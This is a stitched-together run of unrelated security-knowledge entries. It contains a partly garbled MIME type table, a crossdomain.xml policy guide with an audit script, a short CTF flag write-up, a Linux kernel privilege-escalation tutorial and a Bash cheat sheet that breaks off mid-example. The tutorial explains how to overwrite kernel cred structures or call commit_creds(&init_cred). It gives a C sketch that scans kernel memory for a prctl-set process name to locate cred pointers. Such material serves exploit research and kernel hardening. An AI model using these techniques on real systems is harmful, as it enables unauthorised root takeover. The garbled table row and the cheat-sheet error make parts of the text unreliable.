| .anv | application/x-anv |
| .asf | video/x-ms-asf |
| .asx | video/x-ms-asf |
| .avi | video/avi |
| .biz | text/xml |
| .bot | application/x-bot |
| .c90 | application/x-c90 |
| .cat | application/vnd.ms-pki.seccat |
| .cdr | application/x-cdr |
| .cer | application/x-x509-ca-cert |
| .cgm | application/x-cgm |
| .class | java/* |
| .cmp | application/x-cmp |
| .cot | application/x-cot |
| .crt | application/x-x509-ca-cert |
| .css | text/css |
| .dbf | application/x-dbf |
| .dbx | application/x-dbx |
| .dcx | application/x-dcx |
| .dgn | application/x-dgn |
| .dll | application/x-msdownload |
| .dot | application/msword |
| .dtd | text/xml |
| .dwf | application/x-dwf |
| .dxb | application/x-dxb |
| .edn | application/vnd.adobe.edn |
| .eml | message/rfc822 |
| .epi | application/x-epi |
| .eps | application/postscript |
| .exe | application/x-msdownload |
| .fdf | application/vnd.fdf |
| .fo | text/xml |
| .g4 | application/x-g4 |
| . | application/x- |
| .gl2 | application/x-gl2 |
| .hgl | application/x-hgl |
| .hpg | application/x-hpgl |
| .hqx | application/mac-binhex40 |
| .hta | application/hta |
| .htm | text/html |
| .htt | text/webviewhtml |
| .icb | application/x-icb |
| .ico | application/x-ico |
| .ig4 | application/x-g4 |
| .iii | application/x-iphone |
| .ins | application/x-internet-signup |
| .IVF | video/x-ivf |
| .jfif | image/jpeg |
| .jpe | application/x-jpe |
| .jpg | image/jpeg |
| .js | application/x-javascript |
| .la1 | audio/x-liquid-file |
| .latex | application/x-latex |
| .lbm | application/x-lbm |
| .ls | application/x-javascript |
| .m1v | video/x-mpeg |
| .m3u | audio/mpegurl |
| .mac | application/x-mac |
| .math | text/xml |
| .mdb | application/x-mdb |
| .mht | message/rfc822 |
| .mi | application/x-mi |
| .midi | audio/mid |
| .mml | text/xml |
| .mns | audio/x-musicnet-stream |
| .movie | video/x-sgi-movie |
| .mp2 | audio/mp2 |
| .mp3 | audio/mp3 |
| .mpa | video/x-mpg |
| .mpe | video/x-mpeg |
| .mpg | video/mpg |
| .mpp | application/vnd.ms-project |
| .mpt | application/vnd.ms-project |
| .mpv2 | video/mpeg |
| .mpx | application/vnd.ms-project |
| .mxp | application/x-mmxp |
| .nrf | application/x-nrf |
| .odc | text/x-ms-odc |
| .p10 | application/pkcs10 |
| .p7b | application/x-pkcs7-certificates |
| .p7m | application/pkcs7-mime |
| .p7s | application/pkcs7-signature |
| .pci | application/x-pci |
| .pcx | application/x-pcx |
| .pdf | application/pdf |
| .pfx | application/x-pkcs12 |
| .pic | application/x-pic |
| .pl | application/x-perl |
| .pls | audio/scpls |
| .png | image/png |
| .pot | application/vnd.ms-powerpoint |
| .ppm | application/x-ppm |
| .ppt | application/vnd.ms-powerpoint |
| .pr | application/x-pr |
| .prn | application/x-prn |
| .ps | application/x-ps |
| .ptn | application/x-ptn |
| .r3t | text/vnd.rn-realtext3d |
| .ram | audio/x-pn-realaudio |
| .rat | application/rat-file |
| .rec | application/vnd.rn-recording |
| .rgb | application/x-rgb |
| .rjt | application/vnd.rn-realsystem-rjt |
| .rle | application/x-rle |
| .rmf | application/vnd.adobe.rmf |
| .rmj | application/vnd.rn-realsystem-rmj |
| .rmp | application/vnd.rn-rn_music_package |
| .rmvb | application/vnd.rn-realmedia-vbr |
| .rnx | application/vnd.rn-realplayer |
| .rpm | audio/x-pn-realaudio-plugin |
| .rt | text/vnd.rn-realtext |
| .rtf | application/x-rtf |
| .sam | application/x-sam |
| .sdp | application/sdp |
| .sit | application/x-stuffit |
| .sld | application/x-sld |
| .smi | application/smil |
| .smk | application/x-smk |
| .sol | text/plain |
| .spc | application/x-pkcs7-certificates |
| .spp | text/xml |
| .sst | application/vnd.ms-pki.certstore |
| .stm | text/html |
| .svg | text/xml |
| .tdf | application/x-tdf |
| .tga | application/x-tga |
| .tif | application/x-tif |
| .tld | text/xml |
| .torrent | application/x-bittorrent |
| .txt | text/plain |
| .uls | text/iuls |
| .vda | application/x-vda |
| .vml | text/xml |
| .vsd | application/vnd.visio |
| .vss | application/vnd.visio |
| .vst | application/x-vst |
| .vsx | application/vnd.visio |
| .vxml | text/xml |
| .wax | audio/x-ms-wax |
| .wb2 | application/x-wb2 |
| .wbmp | image/vnd.wap.wbmp |
| .wk3 | application/x-wk3 |
| .wkq | application/x-wkq |
| .wm | video/x-ms-wm |
| .wmd | application/x-ms-wmd |
| .wml | text/vnd.wap.wml |
| .wmx | video/x-ms-wmx |
| .wp6 | application/x-wp6 |
| .wpg | application/x-wpg |
| .wq1 | application/x-wq1 |
| .wri | application/x-wri |
| .ws | application/x-ws |
| .wsc |
text/scriptlet | | .wvx | video/x-ms-wvx | | .xdr | text/xml | | .xfdf | application/vnd.adobe.xfdf | | .xls | application/vnd.ms-excel | | .xlw | application/x-xlw | | .xpl | audio/scpls | | .xql | text/xml | | .xsd | text/xml | | .xslt | text/xml | | .x_b | application/x-x_b | | .sisx | application/vnd.symbian.install | | .ipa | application/vnd.iphone | | .xap | application/x-silverlight-app |

---

## Cross-domain policy files

- https://blog.csdn.net/gnail_oug/article/details/53488918

Cross-domain, as the name implies, means the resource you need does not live on your own domain's server and has to be fetched from another domain's server. A cross-domain policy file is an XML document whose main purpose is to grant web clients (such as Adobe Flash Player) permission to handle data across domains. As an analogy: department A of a company has a shared computer holding files meant only for members of department A, so employees of department A may access that computer while people from other departments may not.

Employees of department A can freely use department A's shared computer, but cannot directly access department B's. One day, department B's manager decides their material is very useful and wants to share it with department A, so he gives department A a token; from then on, department A's employees can access department B's shared computer as well.

Mapped onto systems, a common case looks like this: a typical cross-domain request occurs when a business server uploads an image to an image server. For the access to work, the image server has to grant the business server permission to access it — and that permission grant is exactly what the cross-domain policy file `crossdomain.xml` exists for.

**Configuration rules**

- *cross-domain-policy*

  The cross-domain-policy element is the root element of the `crossdomain.xml` policy file. It is only a container for policy definitions and has no attributes of its own. Its child elements are:

  - `site-control`
  - `allow-access-from`
  - `allow-access-from-identity`
  - `allow-http-request-headers-from`

- *site-control*

  The site-control element defines the meta-policy for the current domain. The meta-policy specifies which domain policy files are acceptable besides the master policy file located at the target domain's root (named `crossdomain.xml`). If a client is instructed to use a policy file other than the master one, it must first check the master policy's meta-policy to determine whether the requested policy file is permitted.

  Attributes:

  - `permitted-cross-domain-policies` specifies the meta-policy. The default is master-only for all policy files except socket policy files, whose default is all. Allowed values:
    - none: no policy file anywhere on the target server (including this master policy file) may be used.
    - master-only: only this master policy file is allowed.
    - by-content-type: only policy files served with `Content-Type: text/x-cross-domain-policy` are allowed (HTTP/HTTPS only).
    - by-ftp-filename: only policy files named `crossdomain.xml` are allowed (FTP only).
    - all: all policy files on this target domain are allowed.

- *allow-access-from*

  The allow-access-from element authorizes a requesting domain to read data from the target domain. Access can be granted to multiple domains at once by using the wildcard (*).

  Attributes:

  - `domain`: the requesting domain to be granted access; it can be a domain name or an IP address. Subdomains are treated as different domains. A wildcard asterisk (*) may be used to express multiple domains; a lone asterisk (*) means all domains. Setting it to a lone asterisk, allowing all domains, is generally not recommended.
  - `to-ports`: sockets only; a comma-separated list of ports, or ranges of ports, that a socket connection may connect to. A port range is given by inserting a dash (-) between two port numbers; ranges and single ports can be mixed in the comma-separated list. A wildcard (*) may be used to allow all ports.
  - `secure`: HTTPS and sockets only; specifies whether access is granted only to HTTPS documents from the given origin (true) or to all documents from it (false). If secure is unspecified in an HTTPS policy file, it defaults to true. Using false in an HTTPS policy file is not recommended, as it undermines the security of HTTPS. In a socket policy file the default is false. Specifying secure="true" only makes sense when the socket server accepts localhost connections, since local socket connections are normally not exposed to man-in-the-middle attacks and the secure="true" statement therefore cannot be subverted.

- *allow-access-from-identity*

  The allow-access-from-identity element grants permission based on cryptographic credentials, in sharp contrast with allow-access-from, which grants permission based on origin.

- *allow-http-request-headers-from*

  The allow-http-request-headers-from element authorizes documents from the requesting domain to send user-defined headers to the target domain. Whereas allow-access-from is meant to authorize pulling data from the target domain, this tag authorizes pushing data in the form of headers.

  Attributes:

  - `domain`: the domain to be granted access; it can be a domain name or an IP address, and subdomains are treated as different domains. A wildcard (*) used alone represents all domains; used as a prefix to an explicit second-level domain name separated by a period (.), it represents multiple domains. A single domain is expressed with its own, separate allow-access-from element.
  - `headers`: a comma-separated list of headers the requesting domain is allowed to send. A wildcard (*) may be used to permit all headers, or as a header suffix to cover headers that begin with the same characters but end differently.
  - `secure`: HTTPS only; if set to false, the HTTPS policy file is allowed to authorize requests coming from HTTP origins. The default is true, which grants permission to HTTPS origins only. Using false is not recommended.

**Matching rules**

- Each domain or subdomain must match exactly; e.g. www.example.com matches http://www.example.com.
- IP addresses and domain names do not match each other, even if the IP address is exactly the one the domain name resolves to.
- A domain wildcard matches the domain itself and all of its subdomains.
- A lone wildcard (*) grants access to every requester, which is not recommended. An allow-all permission should only be used when everything within the scope of the policy file is completely public.

**Example file**

```
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <site-control permitted-cross-domain-policies="master-only"/>
    <!-- Allow example.com and its subdomains -->
    <allow-access-from domain="*.example.com"/>
    <!-- Allow http://www.example.com -->
    <allow-access-from domain="www.example.com"/>
    <allow-http-request-headers-from domain="*.csdn.net" headers="*"/>
</cross-domain-policy>
```

---

**Source & Reference**

- [HTTP content-type](https://www.runoob.com/http/http-content-type.html)
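As a practical aside, a quick way to audit a site's policy is to fetch and parse it. Below is a minimal sketch using only the Python standard library; the URL is a placeholder for the site being audited:

```python
import urllib.request
import xml.etree.ElementTree as ET

# Hypothetical target; replace with the site you are auditing.
url = "https://example.com/crossdomain.xml"

with urllib.request.urlopen(url) as resp:
    policy = ET.fromstring(resp.read())

# List every domain granted read access; a bare "*" means any
# Flash/Silverlight client on the web may read responses.
for node in policy.iter("allow-access-from"):
    domain = node.get("domain")
    secure = node.get("secure", "true")  # defaults to true over HTTPS
    print(f"allow-access-from domain={domain!r} secure={secure}")
    if domain == "*":
        print("  [!] wildcard policy: any origin can read data")
```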
sec-knowleage
# Ad Category: Ad ## Description > We interrupt this program for a commercial break > > https://www.youtube.com/watch?v=QzFuwljOj8Y ## Solution The attached YouTube video is a promotional video about the CTF. However, at 00:17, you can spot a long string flashing for a split second: ![](images/ad.png) Apparently this is a flag: CTF{9e796ca74932912c216a1cd00c25c84fae00e139}
sec-knowleage
# Change Self

The kernel locates a process's cred structure through the cred pointer in the process's `task_struct`, and decides what privileges the process has based on the contents of that cred. If the uid-through-fsgid members of the cred structure are all 0, the process is generally considered to have root privileges.

```c
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC    0x43736564
#define CRED_MAGIC_DEAD    0x44656144
#endif
    kuid_t        uid;        /* real UID of the task */
    kgid_t        gid;        /* real GID of the task */
    kuid_t        suid;       /* saved UID of the task */
    kgid_t        sgid;       /* saved GID of the task */
    kuid_t        euid;       /* effective UID of the task */
    kgid_t        egid;       /* effective GID of the task */
    kuid_t        fsuid;      /* UID for VFS ops */
    kgid_t        fsgid;      /* GID for VFS ops */
    ...
}
```

The approach is therefore quite direct; we can escalate privileges by

- directly modifying the contents of the cred structure, or
- redirecting the cred pointer in task_struct to a cred that satisfies our needs.

Either way, there are generally two steps: locate, then modify — much like putting an elephant into a refrigerator.

## Directly modifying the cred

### Via its exact address

We can first obtain the exact address of the cred and then modify it.

#### Locating

There are many ways to find the cred's exact address; depending on whether the search is direct, they fall into the following two kinds.

##### Direct search

The front of the cred structure records the various ids. For an ordinary process, uid through fsgid all carry the identity of the user running it, so we can locate the cred by scanning memory for that pattern.

```c
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC    0x43736564
#define CRED_MAGIC_DEAD    0x44656144
#endif
    kuid_t        uid;        /* real UID of the task */
    kgid_t        gid;        /* real GID of the task */
    kuid_t        suid;       /* saved UID of the task */
    kgid_t        sgid;       /* saved GID of the task */
    kuid_t        euid;       /* effective UID of the task */
    kgid_t        egid;       /* effective GID of the task */
    kuid_t        fsuid;      /* UID for VFS ops */
    kgid_t        fsgid;      /* GID for VFS ops */
    ...
}
```

**In practice we may find many creds that match, mainly because cred structures can be copied and freed.** An intuitive idea is to filter some out during the search by requiring usage != 0, yet creds with usage == 0 will still show up: there is a delay between usage dropping to 0 and the cred actually being freed, and creds are freed lazily through RCU.

##### Indirect search

###### task_struct

The process's `task_struct` holds a pointer to the cred, so we can

1. locate the address of the current process's `task_struct`
2. compute the address where the `cred` pointer is stored, from the pointer's offset within task_struct
3. read out the actual address of the `cred`

###### comm

comm marks the name of the executable and lives in the process's `task_struct`. As the layout shows, comm sits just below the cred pointers, so we can locate comm first and derive the cred's address from there.

```c
/* Process credentials: */

/* Tracer's credentials at attach: */
const struct cred __rcu        *ptracer_cred;

/* Objective and real subjective task credentials (COW): */
const struct cred __rcu        *real_cred;

/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu        *cred;

#ifdef CONFIG_KEYS
/* Cached requested key. */
struct key            *cached_requested_key;
#endif

/*
 * executable name, excluding path.
 *
 * - normally initialized setup_new_exec()
 * - access it with [gs]et_task_comm()
 * - lock it with task_lock()
 */
char                comm[TASK_COMM_LEN];
```

However, if the process name is nothing special, the same string may occur several times in kernel memory, which hurts both the correctness and the speed of the search. We can therefore use prctl to set the process's comm to some unique string before starting to search for comm.

#### Modifying

With this approach we simply set uid through fsgid in the cred to 0. There are many ways to perform the write, for example:

- with an arbitrary-address-read/write primitive, patch the cred directly;
- once we can execute code via ROP, patch the cred with ROP gadgets.

### Without the exact address

We do want to modify the cred's contents, but we don't necessarily need to know exactly where it is — we only need some way of modifying it.

#### (Obsolete) UAF on a chunk of the same size

If we can control where the cred structure is placed when a process is initialized, and we can modify that memory afterwards, privilege escalation is easy. A classic example:

1. allocate a chunk the same size as a cred structure
2. free that chunk
3. fork a new process whose cred happens to reuse the just-freed chunk
4. at this point, modify the relevant fields of the cred through the stale reference, escalating privileges

**This method no longer works on recent kernels**, however: we can no longer allocate objects out of cred_jar directly, because cred_jar is created with the `SLAB_ACCOUNT` flag, and with `CONFIG_MEMCG_KMEM=y` (enabled by default) **cred_jar is no longer merged with the same-sized kmalloc-192**.

```c
void __init cred_init(void)
{
    /* allocate a slab in which we can store credentials */
    cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 0,
            SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL);
}
```

## Modifying the cred pointer

### Via its exact address

With this approach we need to know the exact address of the cred pointer.

#### Locating

##### Direct search

Clearly, there is nothing special about a cred pointer itself, so it is hard to locate one by direct scanning.

##### Indirect search

###### task_struct

The process's `task_struct` holds a pointer to the cred, so we can

1. locate the address of the current process's `task_struct`
2. compute the address where the `cred` pointer is stored, from the pointer's offset within task_struct

###### comm

comm marks the name of the executable and lives in the process's `task_struct`. As the layout shows, comm sits just below the cred pointer, so we can locate comm first and derive the cred pointer's address from there.

```c
/* Process credentials: */

/* Tracer's credentials at attach: */
const struct cred __rcu        *ptracer_cred;

/* Objective and real subjective task credentials (COW): */
const struct cred __rcu        *real_cred;

/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu        *cred;

#ifdef CONFIG_KEYS
/* Cached requested key. */
struct key            *cached_requested_key;
#endif

/*
 * executable name, excluding path.
 *
 * - normally initialized setup_new_exec()
 * - access it with [gs]et_task_comm()
 * - lock it with task_lock()
 */
char                comm[TASK_COMM_LEN];
```

However, if the process name is nothing special, the same string may occur several times in kernel memory, which hurts both the correctness and the speed of the search. We can therefore use prctl to set the process's comm to some unique string before starting to search for comm.

#### Modifying

Concretely, we can modify the pointer in either of two ways:

- Set the cred pointer to the address of the init_cred that already exists in the kernel image. This suits situations where we can write the cred pointer directly and know init_cred's address.
- Forge a cred and point the cred pointer at it. This is rather cumbersome and generally not used.

### Without the exact address

#### commit_creds(&init_cred)

The `commit_creds()` function installs a new cred as both the real_cred and cred fields of the current task_struct. So if we can hijack the kernel's control flow into this function and pass it a root-privileged cred, we escalate the current process directly:

```c
int commit_creds(struct cred *new)
{
    struct task_struct *task = current; /* kernel macro: fetch the current task's PCB from the percpu segment */
    const struct cred *old = task->real_cred;

    //...

    rcu_assign_pointer(task->real_cred, new);
    rcu_assign_pointer(task->cred, new);
```

During kernel initialization, the `init` process is started with root privileges, and its cred structure is the **statically defined** `init_cred`. It follows naturally that we can escalate via `commit_creds(&init_cred)`:

```c
/*
 * The initial credentials for the initial task
 */
struct cred init_cred = {
    .usage            = ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
    .subscribers        = ATOMIC_INIT(2),
    .magic            = CRED_MAGIC,
#endif
    .uid            = GLOBAL_ROOT_UID,
    .gid            = GLOBAL_ROOT_GID,
    .suid            = GLOBAL_ROOT_UID,
    .sgid            = GLOBAL_ROOT_GID,
    .euid            = GLOBAL_ROOT_UID,
    .egid            = GLOBAL_ROOT_GID,
    .fsuid            = GLOBAL_ROOT_UID,
    .fsgid            = GLOBAL_ROOT_GID,
    .securebits        = SECUREBITS_DEFAULT,
    .cap_inheritable    = CAP_EMPTY_SET,
    .cap_permitted        = CAP_FULL_SET,
    .cap_effective        = CAP_FULL_SET,
    .cap_bset        = CAP_FULL_SET,
    .user            = INIT_USER,
    .user_ns        = &init_user_ns,
    .group_info        = &init_groups,
    .ucounts        = &init_ucounts,
};
```

#### (Obsolete) commit_creds(prepare_kernel_cred(0))

The kernel provides `prepare_kernel_cred()` to clone the cred structure of a given process; when the argument is NULL, the function clones `init_cred` and returns a root-privileged cred:

```c
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
    const struct cred *old;
    struct cred *new;

    new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    if (!new)
        return NULL;

    kdebug("prepare_kernel_cred() alloc %p", new);

    if (daemon)
        old = get_task_cred(daemon);
    else
        old = get_cred(&init_cred);
```

It follows that calling `commit_creds(prepare_kernel_cred(NULL))` in kernel space also escalates directly. However, since kernel version 6.2, `prepare_kernel_cred(NULL)` **no longer clones init_cred; it treats a NULL argument as a runtime error and returns NULL**, so this escalation technique no longer applies to kernels 6.2 and above:

```c
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
    const struct cred *old;
    struct cred *new;

    if (WARN_ON_ONCE(!daemon))
        return NULL;

    new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    if (!new)
        return NULL;
```
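The comm-marker search described above lends itself to a compact sketch. The fragment below is a hypothetical user-space illustration only: `kread64()` stands in for whatever arbitrary-read primitive the concrete exploit provides, and the scan window, step, and field offsets are placeholders that have to be recovered from the target kernel build:

```c
/*
 * Sketch of the comm-marker search. kread64() is a HYPOTHETICAL
 * arbitrary-read primitive supplied by the actual exploit; the scan
 * window and the offsets relative to comm are illustrative only.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>

extern uint64_t kread64(uint64_t addr);   /* provided by your exploit */

#define MARKER "pwnmark01234567"          /* 15 chars + NUL == TASK_COMM_LEN */

int main(void)
{
    uint64_t m[2];

    prctl(PR_SET_NAME, MARKER);           /* make our task_struct findable */
    memcpy(m, MARKER, sizeof(m));

    /* walk a (guessed) direct-mapping window, 8 bytes at a time */
    for (uint64_t p = 0xffff888000000000ULL; p < 0xffff888100000000ULL; p += 8) {
        if (kread64(p) != m[0] || kread64(p + 8) != m[1])
            continue;
        /* comm sits a few pointers below ->real_cred / ->cred; the -8/-16
         * slots below are illustrative and vary per config and build */
        printf("comm @ %#llx, cred slot @ %#llx, real_cred slot @ %#llx\n",
               (unsigned long long)p,
               (unsigned long long)(p - 8),
               (unsigned long long)(p - 16));
        break;
    }
    return 0;
}
```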
sec-knowleage
--- title: Bash date: 2020-11-25 18:28:43 background: bg-[#3e4548] tags: - shell - sh - echo - script - linux categories: - Programming intro: This is a quick reference cheat sheet to getting started with linux bash shell scripting. plugins: - copyCode --- Getting Started --------------- ### hello.sh ```bash #!/bin/bash VAR="world" echo "Hello $VAR!" # => Hello world! ``` Execute the script ```shell script $ bash hello.sh ``` ### Variables ```bash NAME="John" echo ${NAME} # => John (Variables) echo $NAME # => John (Variables) echo "$NAME" # => John (Variables) echo '$NAME' # => $NAME (Exact string) echo "${NAME}!" # => John! (Variables) NAME = "John" # => Error (about space) ``` ### Comments ```bash # This is an inline Bash comment. ``` ```bash : ' This is a very neat comment in bash ' ``` Multi-line comments use `:'` to open and `'` to close ### Arguments {.row-span-2} | Expression | Description | |-------------|---------------------------------------| | `$1` … `$9` | Parameter 1 ... 9 | | `$0` | Name of the script itself | | `$1` | First argument | | `${10}` | Positional parameter 10 | | `$#` | Number of arguments | | `$$` | Process id of the shell | | `$*` | All arguments | | `$@` | All arguments, starting from first | | `$-` | Current options | | `$_` | Last argument of the previous command | See: [Special parameters](http://wiki.bash-hackers.org/syntax/shellvars#special_parameters_and_shell_variables) ### Functions ```bash get_name() { echo "John" } echo "You are $(get_name)" ``` See: [Functions](#bash-functions) ### Conditionals {#conditionals-example} ```bash if [[ -z "$string" ]]; then echo "String is empty" elif [[ -n "$string" ]]; then echo "String is not empty" fi ``` See: [Conditionals](#bash-conditionals) ### Brace expansion ```bash echo {A,B}.js ``` --- | Expression | Description | |------------|---------------------| | `{A,B}` | Same as `A B` | | `{A,B}.js` | Same as `A.js B.js` | | `{1..5}` | Same as `1 2 3 4 5` | See: [Brace expansion](http://wiki.bash-hackers.org/syntax/expansion/brace) ### Shell execution ```bash # => I'm in /path/of/current echo "I'm in $(PWD)" # Same as: echo "I'm in `pwd`" ``` See: [Command substitution](http://wiki.bash-hackers.org/syntax/expansion/cmdsubst) Bash Parameter expansions -------------------- ### Syntax {.row-span-2} | Code | Description | |-------------------|---------------------| | `${FOO%suffix}` | Remove suffix | | `${FOO#prefix}` | Remove prefix | | `${FOO%%suffix}` | Remove long suffix | | `${FOO##prefix}` | Remove long prefix | | `${FOO/from/to}` | Replace first match | | `${FOO//from/to}` | Replace all | | `${FOO/%from/to}` | Replace suffix | | `${FOO/#from/to}` | Replace prefix | #### Substrings | Expression | Description | |-----------------|--------------------------------| | `${FOO:0:3}` | Substring _(position, length)_ | | `${FOO:(-3):3}` | Substring from the right | #### Length | Expression | Description | |------------|------------------| | `${#FOO}` | Length of `$FOO` | #### Default values | Expression | Description | |-------------------|------------------------------------------| | `${FOO:-val}` | `$FOO`, or `val` if unset | | `${FOO:=val}` | Set `$FOO` to `val` if unset | | `${FOO:+val}` | `val` if `$FOO` is set | | `${FOO:?message}` | Show message and exit if `$FOO` is unset | ### Substitution ```bash echo ${food:-Cake} #=> $food or "Cake" ``` ```bash STR="/path/to/foo.cpp" echo ${STR%.cpp} # /path/to/foo echo ${STR%.cpp}.o # /path/to/foo.o echo ${STR%/*} # /path/to echo ${STR##*.} # cpp (extension) echo ${STR##*/} # 
foo.cpp (basepath) echo ${STR#*/} # path/to/foo.cpp echo ${STR##*/} # foo.cpp echo ${STR/foo/bar} # /path/to/bar.cpp ``` ### Slicing ```bash name="John" echo ${name} # => John echo ${name:0:2} # => Jo echo ${name::2} # => Jo echo ${name::-1} # => Joh echo ${name:(-1)} # => n echo ${name:(-2)} # => hn echo ${name:(-2):2} # => hn length=2 echo ${name:0:length} # => Jo ``` See: [Parameter expansion](http://wiki.bash-hackers.org/syntax/pe) ### basepath & dirpath ```bash SRC="/path/to/foo.cpp" ``` ```bash BASEPATH=${SRC##*/} echo $BASEPATH # => "foo.cpp" DIRPATH=${SRC%$BASEPATH} echo $DIRPATH # => "/path/to/" ``` ### Transform ```bash STR="HELLO WORLD!" echo ${STR,} # => hELLO WORLD! echo ${STR,,} # => hello world! STR="hello world!" echo ${STR^} # => Hello world! echo ${STR^^} # => HELLO WORLD! ARR=(hello World) echo "${ARR[@],}" # => hello world echo "${ARR[@]^}" # => Hello World ``` Bash Arrays ------ ### Defining arrays ```bash Fruits=('Apple' 'Banana' 'Orange') Fruits[0]="Apple" Fruits[1]="Banana" Fruits[2]="Orange" ARRAY1=(foo{1..2}) # => foo1 foo2 ARRAY2=({A..D}) # => A B C D # Merge => foo1 foo2 A B C D ARRAY3=(${ARRAY1[@]} ${ARRAY2[@]}) # declare construct declare -a Numbers=(1 2 3) Numbers+=(4 5) # Append => 1 2 3 4 5 ``` ### Indexing | - | - | |--------------------|---------------| | `${Fruits[0]}` | First element | | `${Fruits[-1]}` | Last element | | `${Fruits[*]}` | All elements | | `${Fruits[@]}` | All elements | | `${#Fruits[@]}` | Number of all | | `${#Fruits}` | Length of 1st | | `${#Fruits[3]}` | Length of nth | | `${Fruits[@]:3:2}` | Range | | `${!Fruits[@]}` | Keys of all | ### Iteration ```bash Fruits=('Apple' 'Banana' 'Orange') for e in "${Fruits[@]}"; do echo $e done ``` #### With index ```bash for i in "${!Fruits[@]}"; do printf "%s\t%s\n" "$i" "${Fruits[$i]}" done ``` ### Operations {.col-span-2} ```bash Fruits=("${Fruits[@]}" "Watermelon") # Push Fruits+=('Watermelon') # Also Push Fruits=( ${Fruits[@]/Ap*/} ) # Remove by regex match unset Fruits[2] # Remove one item Fruits=("${Fruits[@]}") # Duplicate Fruits=("${Fruits[@]}" "${Veggies[@]}") # Concatenate lines=(`cat "logfile"`) # Read from file ``` ### Arrays as arguments ```bash function extract() { local -n myarray=$1 local idx=$2 echo "${myarray[$idx]}" } Fruits=('Apple' 'Banana' 'Orange') extract Fruits 2 # => Orange ``` Bash Dictionaries ------------ ### Defining ```bash declare -A sounds ``` ```bash sounds[dog]="bark" sounds[cow]="moo" sounds[bird]="tweet" sounds[wolf]="howl" ``` ### Working with dictionaries ```bash echo ${sounds[dog]} # Dog's sound echo ${sounds[@]} # All values echo ${!sounds[@]} # All keys echo ${#sounds[@]} # Number of elements unset sounds[dog] # Delete dog ``` ### Iteration ```bash for val in "${sounds[@]}"; do echo $val done ``` --- ```bash for key in "${!sounds[@]}"; do echo $key done ``` Bash Conditionals ------------ ### Integer conditions | Condition | Description | |---------------------|---------------------------------------------| | `[[ NUM -eq NUM ]]` | <yel>Eq</yel>ual | | `[[ NUM -ne NUM ]]` | <yel>N</yel>ot <yel>e</yel>qual | | `[[ NUM -lt NUM ]]` | <yel>L</yel>ess <yel>t</yel>han | | `[[ NUM -le NUM ]]` | <yel>L</yel>ess than or <yel>e</yel>qual | | `[[ NUM -gt NUM ]]` | <yel>G</yel>reater <yel>t</yel>han | | `[[ NUM -ge NUM ]]` | <yel>G</yel>reater than or <yel>e</yel>qual | | `(( NUM < NUM ))` | Less than | | `(( NUM <= NUM ))` | Less than or equal | | `(( NUM > NUM ))` | Greater than | | `(( NUM >= NUM ))` | Greater than or equal | ### String conditions | Condition | 
Description | |--------------------|-----------------------------| | `[[ -z STR ]]` | Empty string | | `[[ -n STR ]]` | <yel>N</yel>ot empty string | | `[[ STR == STR ]]` | Equal | | `[[ STR = STR ]]` | Equal (Same above) | | `[[ STR < STR ]]` | Less than _(ASCII)_ | | `[[ STR > STR ]]` | Greater than _(ASCII)_ | | `[[ STR != STR ]]` | Not Equal | | `[[ STR =~ STR ]]` | Regexp | ### Example {.row-span-3} #### String ```bash if [[ -z "$string" ]]; then echo "String is empty" elif [[ -n "$string" ]]; then echo "String is not empty" else echo "This never happens" fi ``` #### Combinations ```bash if [[ X && Y ]]; then ... fi ``` #### Equal ```bash if [[ "$A" == "$B" ]]; then ... fi ``` #### Regex ```bash if [[ '1. abc' =~ ([a-z]+) ]]; then echo ${BASH_REMATCH[1]} fi ``` #### Smaller ```bash if (( $a < $b )); then echo "$a is smaller than $b" fi ``` #### Exists ```bash if [[ -e "file.txt" ]]; then echo "file exists" fi ``` ### File conditions {.row-span-2} | Condition | Description | |-------------------|----------------------------------------| | `[[ -e FILE ]]` | <yel>E</yel>xists | | `[[ -d FILE ]]` | <yel>D</yel>irectory | | `[[ -f FILE ]]` | <yel>F</yel>ile | | `[[ -h FILE ]]` | Symlink | | `[[ -s FILE ]]` | Size is > 0 bytes | | `[[ -r FILE ]]` | <yel>R</yel>eadable | | `[[ -w FILE ]]` | <yel>W</yel>ritable | | `[[ -x FILE ]]` | Executable | | `[[ f1 -nt f2 ]]` | f1 <yel>n</yel>ewer <yel>t</yel>han f2 | | `[[ f1 -ot f2 ]]` | f1 <yel>o</yel>lder <yel>t</yel>han f2 | | `[[ f1 -ef f2 ]]` | Same files | ### More conditions | Condition | Description | |----------------------|----------------------| | `[[ -o noclobber ]]` | If OPTION is enabled | | `[[ ! EXPR ]]` | Not | | `[[ X && Y ]]` | And | | `[[ X || Y ]]` | Or | ### logical and, or ```bash if [ "$1" = 'y' -a $2 -gt 0 ]; then echo "yes" fi if [ "$1" = 'n' -o $2 -lt 0 ]; then echo "no" fi ``` Bash Loops ----- ### Basic for loop ```bash for i in /etc/rc.*; do echo $i done ``` ### C-like for loop ```bash for ((i = 0 ; i < 100 ; i++)); do echo $i done ``` ### Ranges {.row-span-2} ```bash for i in {1..5}; do echo "Welcome $i" done ``` #### With step size ```bash for i in {5..50..5}; do echo "Welcome $i" done ``` ### Auto increment ```bash i=1 while [[ $i -lt 4 ]]; do echo "Number: $i" ((i++)) done ``` ### Auto decrement ```bash i=3 while [[ $i -gt 0 ]]; do echo "Number: $i" ((i--)) done ``` ### Continue ```bash {data=3,5} for number in $(seq 1 3); do if [[ $number == 2 ]]; then continue; fi echo "$number" done ``` ### Break ```bash for number in $(seq 1 3); do if [[ $number == 2 ]]; then # Skip entire rest of loop. break; fi # This will only print 1 echo "$number" done ``` ### Until ```bash count=0 until [ $count -gt 